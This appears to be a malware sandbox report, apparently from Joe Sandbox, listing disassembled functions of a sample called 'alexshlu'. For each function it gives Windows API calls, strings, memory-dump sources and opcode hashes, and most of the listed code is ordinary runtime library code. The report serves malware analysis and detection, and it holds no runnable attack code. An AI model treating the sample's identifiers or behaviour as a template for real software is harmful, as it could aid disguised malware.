                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                        • Opcode ID: 7ce3c4ce0cde584039e006f46cd8c1c632bec9ba256b82de32ea61b6f08ac353
                                                                                                                                                                                                                                        • Instruction ID: 0d3f6b70e5979b742a89e5333a0e3e9691a574b03c9cffecc11c11ed9190e83c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ce3c4ce0cde584039e006f46cd8c1c632bec9ba256b82de32ea61b6f08ac353
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75F0AB3B70030997CB049F35D889BAABFA0EFC1720F0A405DEE058B280C2719D42CB91
                                                                                                                                                                                                                                        Function 002BB5BC Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,002B5950,?,20001004,00000000,00000002,?,?,002B4862), ref: 002BB5F0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                        • Opcode ID: 9a3996cfcf2404c2310358229fe0b3035de2e4eb8d6b6648a771751ac0c5857d
                                                                                                                                                                                                                                        • Instruction ID: dd0a38f37eb310d55b363c2296f748bfbc3262461a91aaa0aba97a857b4e0f51
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3996cfcf2404c2310358229fe0b3035de2e4eb8d6b6648a771751ac0c5857d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25E01A32911118BBCB236F61EC08ADE7B26EF44790F008011F905652218BB1CE31AB96
                                                                                                                                                                                                                                        Function 002AD863 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000D984), ref: 002AD868
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                        • Opcode ID: 227e3ead1adaaefb09fa5bc533892f5d0c6fe9a257b6635d111e5e2bdcb4e740
                                                                                                                                                                                                                                        • Instruction ID: 7dbac6952c2c8391279c22f2164ca07cf1bc1c3033ae341bff2285336a8016d9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 227e3ead1adaaefb09fa5bc533892f5d0c6fe9a257b6635d111e5e2bdcb4e740
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Function 002BC275 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                        • Opcode ID: 23eedf47bc54384891ed140793bef19f947c6a99dab73fd27d30f5ca32938cbb
                                                                                                                                                                                                                                        • Instruction ID: b2d0bdbdfde95689ea331e2f571bbfd80e6890b49061d288e82589081202b142
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23eedf47bc54384891ed140793bef19f947c6a99dab73fd27d30f5ca32938cbb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BA01130E02200AF83008F3ABA0C2083BA8AA8028030A802AE000C00A0EA388C80AF02
                                                                                                                                                                                                                                        Function 002A4C00 Relevance: .6, Instructions: 650COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b2bdac32ef503a7950e44baef27db67de43216102fc7aa130cab533a1ccbc597
                                                                                                                                                                                                                                        • Instruction ID: 7e3f3a1d71e950eb4cecbf7784b6cf90d8bdd56dee302fbe4b9556e1eab94fc8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2bdac32ef503a7950e44baef27db67de43216102fc7aa130cab533a1ccbc597
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 374290746287518FC714DF28C49066BB7E1BFCA304F64895DE88A8B3A1DBB4DC61CB42
                                                                                                                                                                                                                                        Function 002A1F20 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 118windowregistryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002A1F53
                                                                                                                                                                                                                                        • RegisterClassW.USER32(?), ref: 002A1F6A
                                                                                                                                                                                                                                        • CreateWindowExW.USER32 ref: 002A1FCA
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002A1FD4
                                                                                                                                                                                                                                        • GetMessageW.USER32(Christmas Balls,00000000,00000000,00000000), ref: 002A2000
                                                                                                                                                                                                                                        • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002A203D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$ClassCreateErrorHandleLastModuleRegisterWindow
                                                                                                                                                                                                                                        • String ID: Christmas Balls$CreatingTool$Keep low...$[err id]: %i
                                                                                                                                                                                                                                        • API String ID: 91802587-478130180
                                                                                                                                                                                                                                        • Opcode ID: 2161ea7bd8a100ecae51e84262b2f4f599689114687a8db4dec71b834ce2e74d
                                                                                                                                                                                                                                        • Instruction ID: 9f8c2dbd68fbaabf85c78cdbeef895a99bf713e36508cb3ee2b7f210eec266fb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2161ea7bd8a100ecae51e84262b2f4f599689114687a8db4dec71b834ce2e74d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91419070A28341DFD300DF24D849B2BB7E4BF9A704F00851DF9899B290DB70D954CB92
                                                                                                                                                                                                                                        Function 002C9712 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00B15C50,00B15C50,00000000,7FFFFFFF,?,002C96FD,00B15C50,00B15C50,00000000,00B15C50,?,?,?,?,00B15C50,00000000), ref: 002C97B8
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002C9873
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002C9902
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C994D
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C9953
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C9989
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C998F
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C999F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 127012223-0
                                                                                                                                                                                                                                        • Opcode ID: dae86bab31de10aedc86de53b7564aa73a03c62dad8df4c49e1b3b924c73ffaf
                                                                                                                                                                                                                                        • Instruction ID: 45def58a13224a00156af302ea12e99d0ee4744cc8fbcf630a1fe10a7ecd045e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dae86bab31de10aedc86de53b7564aa73a03c62dad8df4c49e1b3b924c73ffaf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A71087293120A6FDF219F648C89FAFB7B9EF46310F15031DE908A7142DA759CA4CB51
                                                                                                                                                                                                                                        Function 002ADE85 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 002ADECC
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002ADEF8
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 002ADF37
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002ADF54
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002ADF93
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002ADFB0
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002ADFF2
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002AE015
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                                                                                        • Opcode ID: 7e9e15526ce7345b4d4ef09dc679350a0ee5d8169c094c95f1d0f78230488242
                                                                                                                                                                                                                                        • Instruction ID: 5953da72a4d21e45971c979b69eb9f96989744b40ee20e649fe5458d8ddd4ff8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e9e15526ce7345b4d4ef09dc679350a0ee5d8169c094c95f1d0f78230488242
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C451C07292020BAFEF208F60DC45FAB7BA9EF46780F154429F916E6150DFB4DD218B50
                                                                                                                                                                                                                                        Function 002BD7EB Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                        • Instruction ID: 180e5ac06706b3467487e35fd0a98064ccc48ad8d2c1cde99aaf044395474790
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17B16A32E247569FDB11CF28CC82BEE7BA5EF55390F144165E904AB282F374D961CBA0
                                                                                                                                                                                                                                        Function 002AEE00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEE37
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002AEE3F
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEEC8
                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 002AEEF3
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEF48
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                        • Opcode ID: a6c45bcf7ff79fb168370134c1cef7bff24d0ff25363e656b8a190be59acd7b5
                                                                                                                                                                                                                                        • Instruction ID: 8b48c03b2c545f4d099e90daf337b5b9dfa60ae25d1cfec16a8da2d2292c58a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6c45bcf7ff79fb168370134c1cef7bff24d0ff25363e656b8a190be59acd7b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF41E830E20219AFCF10DF68C885A9EBBB5EF46324F158155E8149B352CB31DE22CF92
                                                                                                                                                                                                                                        Function 002ADD27 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002ADD3B
                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000008,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000,00000000,00000000), ref: 002ADD5A
                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADD88
                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADDE3
                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADDFA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 66001078-3882152299
                                                                                                                                                                                                                                        • Opcode ID: 9fd14ce21d1e21f57b2d7da7bdfba27134633bd8a20dfa49bf16db602f27276f
                                                                                                                                                                                                                                        • Instruction ID: 573ea131474d8e7ae42b36d1736daa81c00a0a3ca906362a62bcebb0aba576d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fd14ce21d1e21f57b2d7da7bdfba27134633bd8a20dfa49bf16db602f27276f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B414931920A06DFCB20DF65D684AAAF3F4FF1A310B50492AD457DB950DB30EEA5CB50
                                                                                                                                                                                                                                        Function 002AE13C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002AE142
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 002AE150
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002AE161
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                        • Opcode ID: 2103449a81373f7a349bdb4bb54455197791b4cc648fb741bc3655b5ffb13a7a
                                                                                                                                                                                                                                        • Instruction ID: 700035741b7d7bc86205dd0d63477a797a386e104c5dd6db236b7aa9eadc0881
